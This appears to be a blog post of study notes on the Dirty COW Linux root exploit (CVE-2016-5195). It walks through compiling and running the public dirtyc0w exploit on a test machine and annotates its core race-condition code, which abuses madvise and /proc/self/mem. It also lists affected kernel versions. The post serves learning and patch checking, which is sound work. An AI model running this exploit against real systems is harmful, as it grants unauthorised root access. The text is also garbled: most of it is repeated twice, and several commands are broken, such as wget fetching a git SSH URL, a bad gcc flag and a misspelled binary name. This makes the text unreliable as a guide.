Linux root exploit - Dirty Cow (dirtyc0w) - CVE -2016-5195
Linux root exploit - Dirty Cow (dirtyc0w) - CVE -2016-5195
https://dirtycow.ninja/
-allows local privilege escalation user(1000) -> root(0)
-found by Phil Oester in the wild orginal finder: unknown
https://github.com/dirtycow/dirtycow.github.io
1) Create test linux machine (with vulnerability)
2) download repo https://github.com/dirtycow/dirtycow.github.io
wget git@github.com:dirtycow/dirtycow.github.io.git
3) compile exploit
gcc -lpthread dirtyc0w.c -on dirtyc0w
4) create file own by root
sudo su root
vim root_file
echo "can I write it?" > root_file ///you read it but not write in to it as a regular user
5) write to root_file via dirty c0w
./dirtyco0w root_file "yes I can!"
cat root_file
dirtyc0w.c code (https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c:
f=open(argv[1],O_RDONLY); ## open file readonly
"This is an ancient bug that was actually attempted to be fixed once
(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug"). "
Dirty bit - "A dirty bit or modified bit is a bit that is associated with a block of computer memory and indicates whether or not the corresponding block of memory has been modified.[1] The dirty bit is set when the processor writes to (modifies) this memory. The bit indicates that its associated block of memory has been modified and has not been saved to storage yet. When a block of memory is to be replaced, its corresponding dirty bit is checked to see if the block needs to be written back to secondary memory before being replaced or if it can simply be removed. Dirty bits are used by the CPU cache and in the page replacement algorithms of an operating system."
https://en.wikipedia.org/wiki/Dirty_bit
Page table entry: https://www.kernel.org/doc/gorman/html/understand/understand006.html
Madvise code: https://github.com/torvalds/linux/blob/5924bbecd0267d87c24110cbe2041b5075173a25/mm/madvise.c#L452
GUP code: https://github.com/torvalds/linux/blob/master/mm/gup.c
If your version is ealier than the following, you are affected:
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
3.16.36-1 +deb8u2 for Debian 8
3.2.82-1 for Debian 7
4.7.8-1 for Debian unstable
uname -rv
Source:
1)https://www.youtube.com/watch?v=kEsshExn7aE
2)https://www.youtube.com/watch?v=99sR7H0MMVw&index=20&list=PLh6V3IQZSBSY4G38FEgJ9KDTBOrpAArO2
https://dirtycow.ninja/
-allows local privilege escalation user(1000) -> root(0)
-found by Phil Oester in the wild orginal finder: unknown
https://github.com/dirtycow/dirtycow.github.io
1) Create test linux machine (with vulnerability)
2) download repo https://github.com/dirtycow/dirtycow.github.io
wget git@github.com:dirtycow/dirtycow.github.io.git
3) compile exploit
gcc -lpthread dirtyc0w.c -on dirtyc0w
4) create file own by root
sudo su root
vim root_file
echo "can I write it?" > root_file ///you read it but not write in to it as a regular user
5) write to root_file via dirty c0w
./dirtyco0w root_file "yes I can!"
cat root_file
dirtyc0w.c code (https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c:
f=open(argv[1],O_RDONLY); ## open file readonly
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0); ## MAP_PRIVATE - create private copy-on-write mapping
printf("mmap %zx\n\n",(uintptr_t) map); ## map a file into memory new memory
pthread_create(&pth1,NULL,madviseThread,argv[1]); ##thread 1
pthread_create(&pth2,NULL,procselfmemThread,argv[2]); ##thread 2
##thread 1
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED); ## it's a syscall ##we dont need first 100 bite memory soon
##subseequent access of pages in the range will succeed, but will result in either repopulating the memory contents from up-to-date
##contents of the underlying mapped file (for shared file mappings shared anonymous mapping. and shmem, based techniques such as
##thread 2
int f=open("/proc/self/mem",O_RDWR);
## open proc file
## /proc is pseudo-file system - information about processes
## /proc/self current process
## /proc/self/mem the meory
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
## writing to copy of the file
|
"This is an ancient bug that was actually attempted to be fixed once
(badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug"). "
Dirty bit - "A dirty bit or modified bit is a bit that is associated with a block of computer memory and indicates whether or not the corresponding block of memory has been modified.[1] The dirty bit is set when the processor writes to (modifies) this memory. The bit indicates that its associated block of memory has been modified and has not been saved to storage yet. When a block of memory is to be replaced, its corresponding dirty bit is checked to see if the block needs to be written back to secondary memory before being replaced or if it can simply be removed. Dirty bits are used by the CPU cache and in the page replacement algorithms of an operating system."
https://en.wikipedia.org/wiki/Dirty_bit
Page table entry: https://www.kernel.org/doc/gorman/html/understand/understand006.html
Madvise code: https://github.com/torvalds/linux/blob/5924bbecd0267d87c24110cbe2041b5075173a25/mm/madvise.c#L452
GUP code: https://github.com/torvalds/linux/blob/master/mm/gup.c
If your version is ealier than the following, you are affected:
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
3.16.36-1 +deb8u2 for Debian 8
3.2.82-1 for Debian 7
4.7.8-1 for Debian unstable
uname -rv
Source:
1)https://www.youtube.com/watch?v=kEsshExn7aE
2)https://www.youtube.com/watch?v=99sR7H0MMVw&index=20&list=PLh6V3IQZSBSY4G38FEgJ9KDTBOrpAArO2
Komentarze
Prześlij komentarz